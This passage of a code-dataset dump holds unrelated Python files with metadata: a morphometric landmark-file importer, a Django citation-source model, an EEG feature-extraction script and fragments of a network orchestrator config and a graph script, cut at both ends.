\"s1\"\n            },\n            {\n                \"name\": \"Firewall\",\n                \"click_config\": {\n                    \"param1\": \"abc\"\n                },\n                \"location\": \"s1\"\n            },\n            {\n                \"name\": \"IPRewriter\",\n                \"click_config\": {\n                    \"param1\": \"abc\"\n                },\n                \"location\": \"s1\"\n            }\n        ],\n        \"route\": [\n            \"ingress\",\n            \"s1\",\n            \"egress\"\n        ]\n    }\n","sub_path":"ochestrator/p4sfc_ochestrator.py","file_name":"p4sfc_ochestrator.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"471472393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport re\nimport xlrd\n\nfrom libpy.modan_dbclass import MdObject, MdDataset, MdLandmark, MdPropertyName, MdProperty\n\nID_TAB_DELIMITED = 1\nID_ABERLINK = 2\n\nFILETYPE_TPS = 0\nFILETYPE_X1Y1 = 1\nFILETYPE_MORPHOLOGIKA = 2\nFILETYPE_EXCEL = 3\nFILETYPE_LIST = ['TPS', 'X1Y1CS', 'Morphologika', 'EXCEL']\nNEWLINE = \"\\n\"\nDEFAULT_DIMENSION = 2\n\n\nclass ModanDataImporter:\n    def __init__(self, parent, type='', text='', list=[]):\n        self.type = type\n        self.parent = 
parent\n self.error_message = ''\n self.dimension = -1\n if text != '':\n self.set_grid_from_text(text)\n elif len(list) > 0:\n self.set_grid_from_list(list)\n\n def set_grid_from_list(self, list=[]):\n self.grid = list\n self.linenum = len(list)\n\n def set_grid_from_text(self, text=''):\n self.orig_text = text.rstrip().replace('\\r\\n', '\\n').replace('\\r', '\\n')\n self.title = ''\n self.lines = self.orig_text.split('\\n')\n self.linenum = len(self.lines)\n self.grid = []\n for i in xrange(self.linenum):\n self.grid.append(self.lines[i].split('\\t'))\n\n def openTpsFile(self, filepath):\n f = open(filepath, 'r')\n tpsdata = f.read()\n f.close()\n\n object_count = 0\n landmark_count = 0\n data = []\n threed = 0\n twod = 0\n objects = {}\n header = ''\n comment = ''\n image_count = 0\n tps_lines = [l.strip() for l in tpsdata.split(NEWLINE)]\n found = False\n for line in tps_lines:\n line = line.strip()\n if line == '':\n continue\n headerline = re.search('^(\\w+)(\\s*)=(\\s*)(\\d+)(.*)', line)\n if headerline == None:\n if header == 'lm':\n point = re.split('\\s+', line)\n if len(point) > 2 and self.isNumber(point[2]):\n threed += 1\n else:\n twod += 1\n\n if len(point)>1:\n data.append(point)\n continue\n elif headerline.group(1).lower() == \"lm\":\n if len(data) > 0:\n if comment != '':\n key = comment\n else:\n key = self.dataset_name + \"_\" + str(object_count + 1)\n objects[key] = data\n data = []\n header = 'lm'\n object_count += 1\n landmark_count, comment = int(headerline.group(4)), headerline.group(5).strip()\n # landmark_count_list.append( landmark_count )\n # if not found:\n #found = True\n elif headerline.group(1).lower() == \"image\":\n image_count += 1\n\n if len(data) > 0:\n if comment != '':\n key = comment\n else:\n key = self.dataset_name + \"_\" + str(object_count + 1)\n objects[key] = data\n data = []\n\n if object_count == 0 and landmark_count == 0:\n return False\n if threed > twod:\n self.dimension = 3\n else:\n self.dimension = 2\n\n self.object_count = object_count\n self.landmark_count = landmark_count\n self.data = objects\n\n return True\n\n def openExcelFile(self, filepath):\n ''' okay.. 
MS Excel file '''\n book = xlrd.open_workbook(filepath)\n object_count = 0\n sheet_list = book.sheets()\n data_list = []\n if len(sheet_list) == 1 or \\\n len(sheet_list) == 3 and ( sheet_list[1].nrows == 0 ) and (\n sheet_list[2].nrows == 0 ):\n ''' all the objects are in a single sheet '''\n object_count = -1\n row_list = []\n sheet = sheet_list[0]\n for r in range(sheet.nrows):\n row = sheet.row_values(r)\n data_list.append(row)\n else:\n for sheet in sheet_list:\n if sheet.nrows > 0 and sheet.name[0] != '#':\n object_count = object_count + 1\n data_list.append(sheet)\n # data_list = sheet_list\n self.object_count = object_count\n self.landmark_count = -1\n self.data = data_list\n return True\n\n def openTextFile(self, filepath):\n f = open(filepath, 'r')\n data = f.read()\n f.close()\n\n return False\n\n def openMorphologikaFile(self, filepath):\n f = open(filepath, 'r')\n morphologika_data = f.read()\n f.close()\n\n object_count = -1\n landmark_count = -1\n data_lines = [l.strip() for l in morphologika_data.split(NEWLINE)]\n found = False\n dsl = ''\n dimension = DEFAULT_DIMENSION\n data = {}\n for line in data_lines:\n line = line.strip()\n if line == \"\":\n continue\n if line[0] == \"'\":\n '''comment'''\n continue\n elif line[0] == '[':\n dsl = re.search('(\\w+)', line).group(0).lower()\n data[dsl] = []\n continue\n else:\n data[dsl].append(line)\n if dsl == 'individuals':\n object_count = int(line)\n if dsl == 'landmarks':\n landmark_count = int(line)\n if dsl == 'dimensions':\n dimension = int(line)\n\n if object_count < 0 or landmark_count < 0:\n return False\n\n self.object_count = object_count\n self.landmark_count = landmark_count\n self.dimension = dimension\n self.data = data\n return True\n\n def checkFileType(self, filepath, filetype=FILETYPE_TPS):\n ( pathname, filename ) = os.path.split(filepath)\n ( filename, fileext ) = os.path.splitext(filename)\n fileext = fileext.lower()\n self.dataset_name = filename\n\n success = False\n\n ''' file type specified when opening '''\n if filetype == FILETYPE_EXCEL:\n success = self.openExcelFile(filepath)\n self.filetype = filetype\n elif filetype == FILETYPE_TPS:\n success = self.openTpsFile(filepath)\n self.filetype = filetype\n elif filetype == FILETYPE_MORPHOLOGIKA:\n success = self.openMorphologikaFile(filepath)\n self.filetype = filetype\n\n ''' second chance! 
file type not specified '''\n if ( not success ):\n print( \"not success\")\n if fileext == '.tps':\n print( \"try tps\")\n success = self.openTpsFile(filepath)\n if success:\n self.filetype = FILETYPE_TPS\n return success\n elif fileext == '.xls':\n success = self.openExcelFile(filepath)\n if success:\n self.filetype = FILETYPE_EXCEL\n else: # if fileext == '.txt':\n print( \"try morphologika\")\n ''' try morphologika first '''\n success = self.openMorphologikaFile(filepath)\n if success:\n self.filetype = FILETYPE_MORPHOLOGIKA\n else:\n print( \"try tps\")\n ''' and then tps'''\n success = self.openTpsFile(filepath)\n if success:\n self.filetype = FILETYPE_TPS\n else:\n ''' add text file open later'''\n pass\n return success\n\n def ImportDataset(self, session, dimension=3):\n ''' don't forget to implement transaction for this method '''\n\n ''' first, insert the dataset '''\n if self.dimension < 0:\n self.dimension = dimension\n\n ds = MdDataset()\n ds.dsname = self.dataset_name\n ds.dimension = self.dimension\n\n dsname = newname = self.dataset_name\n i = 1\n len( session.query(MdDataset).filter(MdDataset.dsname==newname).all() ) > 0\n while len( session.query(MdDataset).filter(MdDataset.dsname==newname).all() ) > 0:\n newname = dsname + \" (\" + str(i) + \")\"\n i += 1\n ds.dsname = newname\n session.add(ds)\n\n ''' and then objects and landmarks '''\n if self.filetype == FILETYPE_TPS:\n self.importTpsFile(ds,session)\n elif self.filetype == FILETYPE_MORPHOLOGIKA:\n self.importMorphologikaFile(ds,session)\n elif self.filetype == FILETYPE_EXCEL:\n self.importExcelFile(ds,session)\n # elif self.filetype == FILETYPE_TEXT:\n # pass\n return\n\n def importMorphologikaFile(self, dataset, session):\n i = 0\n # abc\n for name in self.data['names']:\n obj = MdObject()\n obj.objname = name\n obj.landmark_list = []\n j = 1\n begin = i * self.landmark_count\n count = self.landmark_count\n # print begin, begin + count\n for point in self.data['rawpoints'][begin:begin + count]:\n #print point\n coords = re.split('\\s+', point)\n obj.landmark_list.append(MdLandmark(coords))\n obj.pack_landmark()\n j += 1\n dataset.object_list.append(obj)\n i += 1\n\n group_info = []\n group_number = []\n edge_list = []\n polygon_list = []\n propertyname_list = []\n property_list_list = []\n\n if 'labels' in self.data.keys():\n for line in self.data['labels']:\n labels = re.split('\\s+', line)\n for label in labels:\n propertyname_list.append( label )\n dataset.propertyname_list.append(MdPropertyName(label))\n\n # flush session to get dataset id and mdpropertyname ids\n session.flush()\n\n if 'labelvalues' in self.data.keys():\n for line in self.data['labelvalues']:\n property_list = re.split('\\s+', line)\n property_list_list.append(property_list)\n\n if 'wireframe' in self.data.keys():\n for line in self.data['wireframe']:\n edge = [int(v) for v in re.split('\\s+', line)]\n edge.sort()\n edge_list.append(edge)\n\n if 'polygons' in self.data.keys():\n for line in self.data['polygons']:\n poly = [int(v) for v in re.split('\\s+', line)]\n poly.sort()\n polygon_list.append(poly)\n\n '''a\n print \"n o o\", self.object_count\n print \"n o lm\", self.landmark_count\n print \"dim\", dataset.dimension\n print \"groups\", group_info, group_number\n #print \"names\", object_name\n #print \"groupname_list\", groupname_list\n #print \"groupinfo_list\", groupinfo_list\n #print \"object_list\", raw_object_list\n print \"wireframe\", edge_list\n print \"polygons\", polygon_list\n a'''\n\n ''' Error checking and warning '''\n if 
len(dataset.object_list) == 0:\n print( \"no objects!\")\n if len(dataset.object_list) != self.object_count:\n print( 'number of objects does not match!! %d objects expected, but %d objects found' % (\n self.object_count, len(dataset.object_list) ))\n\n if len( property_list_list ) >0:\n i = 0\n for obj in dataset.object_list:\n\n for j in range(len(property_list_list[i])):\n mdprop = MdProperty(property_list_list[i][j])\n mdprop.object_id = obj.id\n mdprop.propertyname_id = dataset.propertyname_list[j].id\n obj.property_list.append(mdprop)\n obj.dataset_id = dataset.id\n #print object.id\n i += 1\n #percentage = ( float( processed_object ) / float ( self.objectcount) ) * 100\n percentage = ( float(i) / float(self.object_count) ) * 100\n self.parent.SetProgress(int(percentage))\n #print group_info\n edge_list.sort()\n dataset.edge_list = edge_list\n dataset.pack_wireframe()\n polygon_list.sort()\n dataset.polygon_list = polygon_list\n dataset.pack_polygons()\n return\n\n def importTpsFile(self, dataset, session):\n for name in self.data.keys():\n obj = MdObject()\n obj.objname = name\n obj.landmark_list = []\n for point in self.data[name]:\n coords = point\n # print point\n if len(coords)>0:\n lm = MdLandmark(coords)\n obj.landmark_list.append(lm)\n obj.pack_landmark()\n dataset.object_list.append( obj )\n\n def checkExcelSheet(self, sheet):\n new_objects = []\n for row in sheet.rows:\n pass\n return new_objects\n\n def ExcelSheetToMdObject(self, sheet, dataset):\n sheetdata = []\n for r in range(sheet.nrows):\n sheetdata.append(sheet.row_values(r))\n self.set_grid_from_list(sheetdata)\n self.checkDataType()\n mo = MdObject()\n mo.objname = sheet.name\n mo.objdesc = ''\n mo.landmark_list = []\n for lm in self.grid:\n mo.landmark_list.append(MdLandmark(lm))\n dataset.object_list.append(mo)\n return\n\n def importExcelFile(self, dataset, session):\n # TODO : test Excel file import\n for sheet in self.data:\n self.ExcelSheetToMdObject(sheet, dataset)\n # for obj in converted_objects:\n # objects.append( obj )\n\n def checkDataType(self):\n row_to_check = 5\n min_colnum = 2\n\n if ( self.linenum > row_to_check ):\n row_to_check = row_to_check\n else:\n row_to_check = self.linenum\n print( \"row to check\", row_to_check)\n print( \"linenum\", self.linenum)\n threshold = row_to_check * 0.8\n\n if ( row_to_check > 2 ):\n mode_point = 0\n # dim_point = 0\n # prev_colnum = 0\n max_colnum = 10\n colnum = 0\n cols = []\n colIsNumber = []\n #mode = ''\n coord_begin = 0\n coord_end = 0\n aberlink_point = 0\n\n # Check location of the numbers\n for j in xrange(max_colnum):\n colIsNumber.append(0)\n for i in xrange(row_to_check):\n firstcol = unicode(self.grid[i][0])\n if ( firstcol == u'R' or firstcol == 'F' or firstcol == 'P' ):\n aberlink_point += 1\n colnum = len(self.grid[i])\n if ( colnum > min_colnum ):\n mode_point += 1\n if ( colnum > max_colnum ):\n colnum = max_colnum\n for j in xrange(colnum):\n #print \"i:\"+str(i)\n #print \"j:\"+str(j)\n #print self.grid[i][j]\n if ( self.grid[i][j] != '' and self.isNumber(self.grid[i][j]) ):\n colIsNumber[j] += 1\n if ( mode_point >= threshold ):\n mode = ID_TAB_DELIMITED\n if ( aberlink_point >= threshold ):\n mode = ID_ABERLINK\n else:\n mode = ID_TAB_DELIMITED\n for i in xrange(colnum - 1):\n if ( colIsNumber[i] < threshold and colIsNumber[i + 1] >= threshold ):\n coord_begin = i + 1\n if ( colIsNumber[i + 1] >= threshold ):\n coord_end = i + 1\n # set 3 as maximum column numbers\n if ( coord_end - coord_begin > 2 ):\n coord_end = coord_begin + 2\n 
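            # --- added worked example (editor's note, not in the original) ---\n            # With row_to_check = 5 rows shaped like ['name', '1.0', '2.0', '3.0'],\n            # colIsNumber ends up [0, 5, 5, 5, 0, ...] and threshold = 4.0, so\n            # coord_begin = 1, coord_end = 3 and datacol_count = 3: the three\n            # numeric columns are taken as the landmark coordinates.\n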
datacol_count = coord_end - coord_begin + 1\n print( \"begin:[%d]\" % coord_begin)\n print( \"end:[%d]\" % coord_end)\n if (coord_begin > 0 ):\n self.title = self.grid[0][0]\n\n # check if from Aberlink\n # if from aberlink, strip first and last row\n print( self.grid[0][0], self.grid[1][0], self.grid[2][0])\n if ( unicode(self.grid[0][0]) == u'R' and\n ( unicode(self.grid[1][0]) == u'R' or unicode(self.grid[1][0]) == u'F' ) and\n unicode(self.grid[2][0]) == u'P' ):\n print( \"delete first row\")\n del self.grid[0]\n last_row = len(self.grid) - 1\n #print self.grid[last_row]\n if ( ( unicode(self.grid[last_row - 2][0]) == u'R' or unicode(self.grid[last_row - 2][0]) == u'F' ) and\n unicode(self.grid[last_row - 1][0]) == u'P' and\n unicode(self.grid[last_row][0]) == u'R' ): #and\n #float( self.grid[last_row][1] ) == 0.0 and\n #float( self.grid[last_row][2] ) == 0.0 and\n #float( self.grid[last_row][3] ) == 0.0 ):\n #print 'last row del'\n del self.grid[len(self.grid) - 1]\n print( \"delete last row\")\n\n #print len( self.grid )\n max_row = len(self.grid)\n #half_max_row = int( max_row / 2 )\n #print max_row\n #print half_max_row\n if ( mode == ID_ABERLINK ):\n for i in xrange(max_row / 2):\n #print i\n j = max_row - 2 * i\n #print j\n del self.grid[max_row - 2 * i - 1]\n\n for cols in ( self.grid ):\n for i in xrange(datacol_count):\n cols[i] = cols[coord_begin + i]\n cols[i + 1:len(cols)] = []\n # pass\n # print self.title\n #print self.grid\n\n def isNumber(self, s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\n# text = \"this is title\\t1\\t1\\t1\\n\"\n# text += \"\\t1\\t1\\t2\\n\"\n#text += \"\\t1\\t1\\t3\\n\"\n#text += \"\\t1\\t1\\t4\\n\"\n#text += \"\\t2\\t3\\t4\\n\"\n#text += \"\\t22\\t33\\t44\"\n#di = ModanDataImporter(text=text)\n#di.checkDataType()\n","sub_path":"libpy/dataimporter.py","file_name":"dataimporter.py","file_ext":"py","file_size_in_byte":18389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524645812","text":"\"\"\"Model classes for sources.\"\"\"\n\nimport logging\nimport re\nfrom typing import TYPE_CHECKING, Dict, List, Optional, Sequence, Union\n\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError\nfrom django.db import models\nfrom django.utils.html import format_html\nfrom django.utils.safestring import SafeString\nfrom django.utils.translation import ugettext_lazy as _\nfrom gm2m import GM2MField as GenericManyToManyField\nfrom polymorphic.models import PolymorphicModel\n\nfrom apps.entities.models.model_with_related_entities import ModelWithRelatedEntities\nfrom apps.search.models import SearchableDatedModel\nfrom apps.sources.manager import PolymorphicSourceManager, PolymorphicSourceQuerySet\nfrom apps.sources.models.source_file import SourceFile\nfrom apps.sources.serializers import SourceSerializer\nfrom core.fields import HistoricDateTimeField, HTMLField\nfrom core.models import retrieve_or_compute\nfrom core.structures.historic_datetime import HistoricDateTime\nfrom core.utils.html import NEW_TAB, components_to_html, compose_link, soupify\nfrom core.utils.string import fix_comma_positions\n\nif TYPE_CHECKING:\n from apps.entities.models import Entity\n from apps.sources.models.source_containment import SourceContainment\n\nMAX_CITATION_STRING_LENGTH: int = 500\nMAX_CITATION_HTML_LENGTH: int = 1000\nMAX_URL_LENGTH: int = 100\nMAX_ATTRIBUTEE_HTML_LENGTH: int = 300\nMAX_ATTRIBUTEE_STRING_LENGTH: int = 100\nMAX_TITLE_LENGTH: int = 250\n\nCOMPONENT_DELIMITER 
= ', '\n\nSOURCE_TYPES = (('P', 'Primary'), ('S', 'Secondary'), ('T', 'Tertiary'))\n\nCITATION_PHRASE_OPTIONS = (\n (None, ''),\n ('quoted in', 'quoted in'),\n ('cited in', 'cited in'),\n)\n\n\nclass Source(PolymorphicModel, SearchableDatedModel, ModelWithRelatedEntities):\n \"\"\"A source of content or information.\"\"\"\n\n attributee_html = models.CharField(\n max_length=MAX_ATTRIBUTEE_HTML_LENGTH, null=True, blank=True\n )\n attributee_string = models.CharField(\n max_length=MAX_ATTRIBUTEE_STRING_LENGTH, null=True, blank=True\n )\n attributees = models.ManyToManyField(\n to='entities.Entity',\n through='SourceAttribution',\n related_name='attributed_sources',\n blank=True, # Some sources may not have attributees.\n verbose_name=_('attributees'),\n )\n citation_html = models.TextField(\n verbose_name=_('citation HTML'),\n null=False, # cannot be null in db\n blank=True, # can be left blank in admin form\n )\n citation_string = models.CharField(\n max_length=MAX_CITATION_STRING_LENGTH,\n null=False, # cannot be null in db\n blank=True, # can be left blank in admin form\n unique=True,\n )\n containers = models.ManyToManyField(\n to='self',\n through='sources.SourceContainment',\n through_fields=('source', 'container'),\n related_name='contained_sources',\n symmetrical=False,\n blank=True,\n )\n date = HistoricDateTimeField(null=True, blank=True)\n description = HTMLField(null=True, blank=True, paragraphed=True)\n file = models.ForeignKey(\n to=SourceFile,\n related_name='sources',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n verbose_name='file',\n )\n location = models.ForeignKey(\n to='places.Place', null=True, blank=True, on_delete=models.SET_NULL\n )\n publication_date = HistoricDateTimeField(null=True, blank=True)\n related = GenericManyToManyField(\n 'quotes.Quote',\n 'occurrences.Occurrence',\n through='sources.Citation',\n related_name='sources',\n blank=True,\n )\n title = models.CharField(\n verbose_name=_('title'), max_length=MAX_TITLE_LENGTH, null=True, blank=True\n )\n url = models.URLField(\n max_length=MAX_URL_LENGTH,\n null=True,\n blank=True,\n help_text='URL where the source can be accessed online',\n )\n\n class Meta:\n ordering = ['-date']\n\n objects = PolymorphicSourceManager.from_queryset(PolymorphicSourceQuerySet)()\n searchable_fields = ['citation_string', 'description']\n serializer = SourceSerializer\n slug_base_field = 'title'\n\n def __str__(self):\n \"\"\"Return the source's string representation.\"\"\"\n return self.citation_string\n\n def clean(self):\n \"\"\"Prepare the source to be saved.\"\"\"\n super().clean()\n self.citation_html = self.calculate_citation_html()\n self.citation_string = soupify(self.citation_html).get_text()\n if not self.file:\n if self.containment and self.containment.container.file:\n self.file = self.containment.container.file\n if self.pk: # If this source is not being newly created\n is_duplicate = (\n Source.objects.exclude(pk=self.pk)\n .filter(citation_string=self.citation_string)\n .exists()\n )\n if is_duplicate:\n raise ValidationError(\n f'Unable to save this source because it duplicates an existing source '\n f'or has an identical string: {self.citation_string}'\n )\n for container in self.containers.all():\n if self in container.containers.all():\n raise ValidationError(\n f'This source cannot be contained by {container}, '\n f'because that source is already contained by this source.'\n )\n\n @property\n def ctype(self):\n return self.polymorphic_ctype\n\n @property\n def escaped_citation_html(self) -> 
SafeString:\n return format_html(self.citation_html)\n\n @property\n def calculate_attributee_html(self) -> Optional[str]:\n \"\"\"Return an HTML string representing the source's attributees.\"\"\"\n # Check for pk to avoid RecursionErrors with not-yet-saved objects\n has_attributees = self.attributees.exists() if self.pk else False\n if self.attributee_string:\n attributee_html = self.attributee_string\n if has_attributees:\n for entity in self.attributees.all().iterator():\n if entity.name in attributee_html:\n attributee_html = attributee_html.replace(\n entity.name, entity.name_html\n )\n else:\n logging.info(f'Returning preset creator string: {attributee_html}')\n return format_html(attributee_html)\n elif not has_attributees:\n return None\n attributees = self.ordered_attributees\n n_attributions = len(attributees)\n first_attributee = attributees[0]\n html = first_attributee.name_html\n if n_attributions == 2:\n html = f'{html} and {attributees[1].name_html}'\n elif n_attributions == 3:\n html = f'{html}, {attributees[1].name_html}, and {attributees[2].name_html}'\n elif n_attributions > 3:\n html = f'{html} et al.'\n return html\n\n def calculate_citation_html(self) -> str:\n \"\"\"Return the HTML representation of the source, including its containers.\"\"\"\n # TODO: html methods should be split into different classes and/or mixins.\n html = self.__html__()\n container_strings = self.get_container_strings()\n if container_strings:\n containers = ', and '.join(container_strings)\n html = f'{html}, {containers}'\n elif getattr(self, 'page_number', None):\n page_number_html = _get_page_number_html(\n self, self.file, self.page_number, self.end_page_number\n )\n html = f'{html}, {page_number_html}'\n if not self.file:\n if self.link and self.link not in html:\n html = f'{html}, retrieved from {self.link}'\n if getattr(self, 'information_url', None) and self.information_url:\n html = (\n f'{html}, information available at '\n f'{compose_link(self.information_url, href=self.information_url, target=\"_blank\")}'\n )\n the_code_below_is_good = False\n if the_code_below_is_good:\n # TODO: Remove search icon; insert link intelligently\n if self.file:\n html += (\n f''\n f''\n f''\n )\n elif self.url:\n link = self.url\n if self.page_number and 'www.sacred-texts.com' in link:\n link = f'{link}#page_{self.page_number}'\n html += (\n f''\n f''\n f''\n )\n return format_html(fix_comma_positions(html))\n\n @property\n def containment(self) -> Optional['SourceContainment']:\n \"\"\"Return the source's primary containment.\"\"\"\n try:\n return self.source_containments.first()\n except (ObjectDoesNotExist, AttributeError):\n return None\n\n @property\n def escaped_citation_html(self) -> SafeString:\n return format_html(self.citation_html)\n\n def get_container_strings(self) -> Optional[List[str]]:\n \"\"\"Return a list of strings representing the source's containers.\"\"\"\n containments = self.source_containments.order_by('position')[:2]\n container_strings = []\n same_creator = True\n for containment in containments:\n container_html = f'{containment.container.html}'\n\n # Determine whether the container has the same attributee\n if containment.container.attributee_html != self.attributee_html:\n same_creator = False\n\n # Remove redundant creator string if necessary\n creator_string_is_duplicated = (\n same_creator\n and self.attributee_html\n and self.attributee_html in container_html\n )\n if creator_string_is_duplicated:\n container_html = container_html[len(f'{self.attributee_html}, ') 
:]\n\n # Include the page number\n if containment.page_number:\n page_number_html = _get_page_number_html(\n containment.source,\n containment.source.file,\n containment.page_number,\n containment.end_page_number,\n )\n container_html = f'{container_html}, {page_number_html}'\n container_html = (\n f'{containment.phrase} in {container_html}'\n if containment.phrase\n else f'in {container_html}'\n )\n container_strings.append(container_html)\n return container_strings\n\n def get_date(self) -> Optional[HistoricDateTime]:\n \"\"\"Get the source's date.\"\"\" # TODO: prefetch container?\n if self.date:\n return self.date\n elif self.containment and self.containment.container.date:\n return self.containment.container.date\n return None\n\n @property # type: ignore\n @retrieve_or_compute(attribute_name='href')\n def href(self) -> Optional[str]:\n \"\"\"\n Return the href to use when providing a link to the source.\n\n If the source has a file, the URL of the file is returned;\n otherwise, the source's `url` field value is returned.\n \"\"\"\n if self.file:\n url = self.file.url\n page_number = self.file.default_page_number\n if getattr(self, 'page_number', None):\n page_number = self.page_number + self.file.page_offset\n if page_number:\n url = _set_page_number(url, page_number)\n else:\n url = self.url\n return url\n\n @property\n def link(self) -> Optional[SafeString]:\n \"\"\"Return an HTML link element containing the source URL, if one exists.\"\"\"\n if self.url:\n return format_html(f'{self.url}')\n return None\n\n @property\n def linked_title(self) -> Optional[SafeString]:\n \"\"\"Return the source's title as a link.\"\"\"\n if not self.title:\n return None\n html = (\n compose_link(\n self.title,\n href=self.href,\n klass='source-title display-source',\n target=NEW_TAB,\n )\n if self.href\n else self.title\n )\n return format_html(html)\n\n @property\n def ordered_attributees(self) -> List['Entity']:\n \"\"\"Return an ordered list of the source's attributees.\"\"\"\n try:\n attributions = self.attributions.select_related('attributee')\n return [attribution.attributee for attribution in attributions]\n except (AttributeError, ObjectDoesNotExist):\n return []\n\n @property # type: ignore\n @retrieve_or_compute(attribute_name='containers')\n def serialized_containments(self) -> List[Dict]:\n \"\"\"Return the source's containers, serialized.\"\"\"\n return [\n containment.container.serialize()\n for containment in self.source_containments.all().select_related(\n 'container'\n )\n ]\n\n def __html__(self) -> str:\n \"\"\"\n Return the source's HTML representation, not including its containers.\n\n Must be defined by models inheriting from Source.\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def components_to_html(components: Sequence[Optional[str]]):\n \"\"\"Combine a list of HTML components into an HTML string.\"\"\"\n return components_to_html(components, delimiter=COMPONENT_DELIMITER)\n\n\ndef _get_page_number_url(\n source: Source, file: SourceFile, page_number: int\n) -> Optional[str]:\n \"\"\"TODO: write docstring.\"\"\"\n url = source.file.url or None\n if not url:\n return None\n page_number += file.page_offset\n return _set_page_number(url, page_number)\n\n\ndef _get_page_number_link(url: str, page_number: int) -> Optional[str]:\n \"\"\"TODO: write docstring.\"\"\"\n if not url:\n return None\n return compose_link(page_number, href=url, klass='display-source', target=NEW_TAB)\n\n\ndef _get_page_number_html(\n source: Source,\n file: Optional[SourceFile],\n page_number: 
int,\n end_page_number: Optional[int] = None,\n) -> str:\n \"\"\"TODO: write docstring.\"\"\"\n pn_url = _get_page_number_url(source=source, file=file, page_number=page_number)\n pn = _get_page_number_link(url=pn_url, page_number=page_number) or page_number\n if end_page_number:\n end_pn_url = _get_page_number_url(\n source=source, file=file, page_number=end_page_number\n )\n end_pn = (\n _get_page_number_link(url=end_pn_url, page_number=end_page_number)\n or end_page_number\n )\n return f'pp. {pn}–{end_pn}'\n return f'p. {pn}'\n\n\ndef _set_page_number(url: str, page_number: Union[str, int]) -> str:\n page_param = 'page'\n if f'{page_param}=' in url:\n url = re.sub(rf'{page_param}=\\d+', f'{page_param}={page_number}', url)\n else:\n url = f'{url}#{page_param}={page_number}'\n return url\n","sub_path":"apps/sources/models/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":15480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"251015297","text":"import glob\nimport os\nimport shutil\nimport random\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import resample\nfrom scipy.fftpack import rfft\nfrom sklearn import preprocessing # TODO check that\nimport scipy.io as sio\n\nimport argparse\nfrom tqdm import tqdm\n\n\ndef cmatrix_with_evals(data):\n \"\"\" Returns upper triangle of correlation matrix\n and its sorted eigenvalues. \"\"\"\n cm = np.corrcoef(preprocessing.scale(data, axis=1), rowvar=0)\n n = cm.shape[0]\n return np.concatenate([cm[np.triu_indices(n, 1)],\n np.sort(np.fabs(np.linalg.eigvalsh(cm)))],\n axis=0)\n\n\ndef compute_features(data):\n \"\"\" Return Birchwood features for data sequence. \"\"\"\n if np.allclose(data, 0):\n # nothing to do...\n return np.empty(0)\n\n # Birchwood takes a slice too\n power = np.absolute(rfft(data, axis=0))[50:2500]\n resampled = resample(power, num=18, axis=0)\n resampled[np.less_equal(resampled, 0)] = 1e-6 # fix the log10\n logfreq = np.log10(resampled)\n # skip data that produce NAs\n # if np.any(np.isnan(logfreq)) or np.allclose(data, 0):\n # return np.empty(0)\n features = [logfreq.ravel(),\n cmatrix_with_evals(logfreq),\n cmatrix_with_evals(data)]\n return np.concatenate(features, axis=0)\n\n\ndef data_sequences(data, dt=50):\n freq = 400.0\n n = data.shape[0]\n breaks = np.arange(0, n, dt * freq).astype('int')\n return (data[start:stop] for start, stop in zip(breaks[:-1], breaks[1:]))\n # for start, stop in zip(breaks[:-1], breaks[1:]):\n # seq = data[start:stop]\n # if np.allclose(seq, 0.0):\n # print(seq)\n # continue\n # else:\n # yield seq\n\n\ndef save_feature_matrix(data, fn):\n columns = ['target'] + ['A' + str(i) for i in xrange(data.shape[1] - 1)]\n df = pd.DataFrame(data, columns=columns)\n df.to_csv(fn, sep=';', index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('data_dir', help='directory with data files')\n parser.add_argument('-t', '--test-ratio', type=float,\n action='store', default=-1,\n help='ratio of test data for cross-validation')\n parser.add_argument('-o', '--output', default='train-data.csv',\n help='csv output file.')\n parser.add_argument('-c', '--copy-train', action='store_true',\n help='copy files used for training.')\n args = parser.parse_args()\n\n test_dir = os.path.splitext(args.output)[0] + \"-test/\"\n train_dir = os.path.splitext(args.output)[0] + \"-train/\"\n if args.test_ratio > 0:\n shutil.rmtree(test_dir, ignore_errors=True)\n os.mkdir(test_dir)\n if 
args.copy_train:\n shutil.rmtree(train_dir, ignore_errors=True)\n os.mkdir(train_dir)\n\n train = []\n skipped = 0\n test_files = []\n for sfile in tqdm(glob.glob(os.path.join(args.data_dir, '*.mat'))):\n fileid = os.path.splitext(os.path.basename(sfile))[0]\n preictal = fileid[-1] == '1'\n\n content = sio.loadmat(sfile, struct_as_record=False,\n verify_compressed_data_integrity=False,\n squeeze_me=True)['dataStruct']\n data = content.data.astype(float)\n features = np.array(filter(lambda f: f.shape != (0,),\n [compute_features(d)\n for d in data_sequences(data)]))\n if features.shape == (0,):\n skipped += 1\n continue\n\n features = np.insert(features, 0, int(preictal), axis=1)\n if random.random() < args.test_ratio:\n tfile = os.path.join(test_dir,\n os.path.basename(fileid) + '.csv')\n save_feature_matrix(features, tfile)\n test_files.append(os.path.basename(sfile))\n else:\n if args.copy_train:\n shutil.copy(sfile,\n os.path.join(train_dir, os.path.basename(sfile)))\n train.append(features)\n\n save_feature_matrix(np.concatenate(train), args.output)\n print(\"Skipped {0:d} files, created {1:d} test files.\"\n .format(skipped, len(test_files)))\n","sub_path":"birchwood-features.py","file_name":"birchwood-features.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99918576","text":"import os\r\nimport sys\r\nsys.path.append('..')\r\nsys.path.append('../..')\r\nimport argparse\r\nimport utils\r\nfrom student_utils_sp18 import *\r\n\r\n\"\"\"\r\n======================================================================\r\n Complete the following function.\r\n======================================================================\r\n\"\"\"\r\n\r\ndef init_timesaved(time_saved, adjacency_matrix):\r\n for i in range(len(adjacency_matrix)): #for each kingdom i\r\n count = 0\r\n for j in range(len(adjacency_matrix[i])): #each j is a neighbor of i\r\n if i != j and adjacency_matrix[i][j] 